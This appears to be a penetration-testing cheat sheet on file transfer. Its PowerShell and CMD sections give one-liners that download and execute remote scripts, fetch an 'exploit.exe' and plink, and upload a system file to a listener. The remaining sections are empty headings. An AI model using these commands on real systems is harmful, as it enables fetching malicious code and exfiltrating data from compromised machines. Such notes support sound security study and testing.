πFile Transfer
Windows
Powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')Invoke-FileUpload -Uri http://10.10.14.24:80/upload -File C:\Windows\System32\drivers\etc\hostsCMD
certutil -urlcache -f ${file url} filenamepowershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exeLinux and Windows
Python Server
Apache Server
SMB
FTP :
To Upload:
Webdav (If port 445 restrictions present)
Linux
If no write permissions:
Bash
Netcat
SSH
Base64
Linux
Powershell
Last updated